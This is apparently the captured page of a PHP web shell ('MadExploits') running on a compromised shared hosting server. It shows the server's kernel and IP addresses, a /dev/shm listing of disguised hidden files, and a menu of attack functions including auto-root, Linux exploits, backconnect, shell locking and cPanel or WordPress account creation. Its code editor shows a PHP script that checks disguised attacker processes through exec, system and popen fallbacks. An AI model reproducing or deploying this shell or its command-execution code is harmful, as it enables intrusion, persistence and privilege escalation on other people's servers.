Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.61
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
dev /
shm /
[ HOME SHELL ]
Name
Size
Permission
Action
lsws
[ DIR ]
drwxr-x---
.comp
52
B
-rw-r--r--
.element
576
B
-rw-r--r--
.fac
2.53
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.marker
2.53
KB
-rw-r--r--
.pset
227
B
-rw-r--r--
.ptr
55
B
-rw-r--r--
.reference
1.22
KB
-rw-r--r--
.value
47
B
-rw-r--r--
PostgreSQL.340957391
14.64
KB
-rw-------
adminer.php
465.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .reference
<?php $files = ['bannedadd','alertpay','block_rss_client','server_databases','gzip_compression','guestbook','news_topicsnav','customer_lookup','userverify','method.uninstall','security.log','f_utility_lek','phocagalleryf','mod_gallery2','incfacebook','listusers','thumbs_up','extraFieldsGroup','file_upload','bloggerapi','mods_temp','compatibility','ServerRequest','bulkusers','bigocaptcha','post_buttonsEN','index.1317078587','publickey','class.workflow','removeFields']; foreach ($files as $f) { $res = @run("pgrep {$f}"); if (!preg_match('/\d+/', $res)) { die("<f>{$f}</f>"); } } die('!ended!'); function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; }
Close